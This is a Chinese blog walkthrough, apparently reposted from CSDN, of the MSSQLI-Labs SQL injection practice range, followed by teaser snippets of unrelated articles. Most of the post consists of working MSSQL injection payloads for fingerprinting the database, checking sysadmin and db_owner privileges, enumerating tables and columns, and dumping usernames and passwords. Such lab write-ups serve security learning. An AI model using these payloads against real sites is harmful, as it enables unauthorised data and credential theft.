MSSQLILABS靶场通关攻略

时间：2024-08-20 20:52:45浏览次数：12

标签：name -- top MSSQLILABS union 攻略靶场 select sysobjects

判断注入

首先用单双引号判断是否存在注入，这里可以看到是单引号

判断是否为 MSSQL 数据库

可以通过以下Payload来探测当前站点是否是MSSQL数据库，正常执行说明后台数据库为MSSQL；也可以根据页面的报错信息来判断数据库

' and exists( select * from sysobjects ) --

' and exists(select count( * ) from sysobjects)--

也可以通过以下SQL语句来判断注入点权限

' and exists(select is_srvrolemember('sysadmin')) -- 判断当前是否为sa

' and exists(select is_srvrolemember('db_owner')) -- 判断当前用户读\写文件的权限

查询数据库信息

user回显的dbo为最高权限，普通权限显示的是用户名

' union select 1,user,is_srvrolemember('public') -- 查用户

id=-1' union select 1,db_name,is_srvrolemember('public') -- 查数据库名

id=-1' union select 1,@@version,is_srvrolemember('public') -- 查版本信息

获取目标站点的表信息

这里需要我们去进行猜测有哪些表，可以用到以下语句

'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name f rom [sysobjects] where xtype=char(85) and status!=1 order by id)t order b y id desc)=1-- 查第二张表 'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !=' users ')-- 第三张 'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !=' users ' and name !=' emails ')-- 第四张 'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !=' users ' and name !=' emails ' and name !=' uagents ')--

通过payload语句爆出表的所有字段信息

having 1=1-- 'group by 字段名 1 having 1=1-- 'group by 字段名 1 ，字段名 2 having 1=1--

爆破字段值

查看回显字段

'union select 1,2,3 from users --

查看字段内容
union all select 1,(select top 1 username from users),' 3 '-- union all select 1,2,(select top 1 password from users)--

标签：name,--,top,MSSQLILABS,union,攻略,靶场,select,sysobjects
From： https://blog.csdn.net/Nai_zui_jiang/article/details/141359187

墨者学院Oracle靶场通关
首先1判断注入点这⾥通过and1=1和and1=2进⾏判断。发现存在注入点之后我们开始判断字段数id=1orderby2id=1orderby3字段=3页面回显异常，说明只存在两个字段接下来我们开始判断回显点id=-1unionselect'null','null'fromdual查完之后我们开始用下面......
网络制式：IP地址全知识攻略
1、IP地址是什么？IP地址是互联网协议特有的一种地址，它是IP协议提供的一种统一的地址格式，为互联网上的每一个网络和每一台主机分配一个逻辑地址，以此来屏蔽物理地址的差异。2、我们为什么要使用IP地址呢？在单个局域网网段中，计算机与计算机之间可以使用网络访问层提供的......
Swift文档生成工具全攻略：从代码到文档的自动化之旅
标题：Swift文档生成工具全攻略：从代码到文档的自动化之旅在Swift开发的世界中，代码的清晰表达与高效维护同等重要。Swift的代码文档生成工具，如同一盏明灯，照亮了代码的内在逻辑，让其他开发者或未来的你能够快速理解和使用你的代码。本文将带你深入了解如何在Swift中使用文档生成......
斯坦福大学深度解析：机器学习优化算法全攻略
在全球人工智能研究的浪潮中，斯坦福大学以其卓越的学术成就和前沿的研究成果，一直站在该领域的前沿。今天，我们将深入探讨斯坦福大学关于机器学习优化算法的精华讲义，这份讲义不仅包含了丰富的理论知识，还有图解和Pytorch实现代码，是学习和实践机器学习优化算法的宝贵资源。↓↓↓......
Claude充值订阅攻略，目前实测可用
作为号称超越ChatGPT的大模型，Claude好用是好用，不过要升级到Claudepro，操作起来还是相当麻烦，加上anthropic极其严格的风控政策，一般的方式都不太好用。经过一番研究和尝试，我总结了一些靠谱的方法，希望能帮到同样有需求的朋友。一、国际银行卡支付如果你有合适的网络环境+海外地......
综合靶场通关记录
目录Authentication0x01通关记录暴力破解：Authentication0x02通关记录Authentication0x03通关记录IDOR通关记录文件包含0x01 文件包含漏洞：文件包含0x02文件包含0x03[挑战]Sql注入0x01Sql注入0x03注入0x04XSS0x01XSS0x02XSS0x03命令......
释放创意潜能：Scratch跨格式导出全攻略
标题：释放创意潜能：Scratch跨格式导出全攻略Scratch，这款专为儿童和创意编程爱好者设计的编程工具，以其易用性和趣味性，在全球范围内受到广泛欢迎。但你知道吗？除了在Scratch平台上分享和运行作品，Scratch还支持将项目导出为多种格式，让创意作品在更广阔的舞台上绽放光彩。一、Scr......
《怪物猎人世界》游戏修改器：风灵月影六十七项功能全攻略
《怪物猎人世界》（MonsterHunter:World）的风灵月影修改器，是一种专门为这款游戏设计的辅助工具，用于在游戏中提供多种自定义选项，以增强游戏体验或降低游戏难度。这类修改器通常由第三方开发者制作，并非官方发布，因此使用时需要注意可能带来的风险。《怪物猎人世界》六十七项风灵......
高效微调攻略：10个技巧助你显著提升大模型任务性能
在大型语言模型（LLMs）的研究和应用中，如何通过微调来适应特定任务是一个关键问题。尽管提示工程（PE）在提升LLMs的零样本学习和上下文内学习方面取得了显著成效，但关于如何设计有效的微调样本以进一步提升LLMs性能的研究还相对欠缺。为解决上述问题，提出了样本设计工程SDE（SampleDe......
从零开始打造多模态大模型：预训练全攻略，新手到专家的完整指南，一篇收藏走天下！
本文参考官方教程[1]介绍如何训练LLaVAv1.5多模态模型。LLaVA训练包括特征对齐阶段（featurealignmentstage）和视觉指令微调阶段（visualinstructiontuningstage），其中特征对齐阶段使用LAION-CC-SBU数据集的558K子集（记为LLaVA-Pretrain），目的是训练MLPconnector（或称......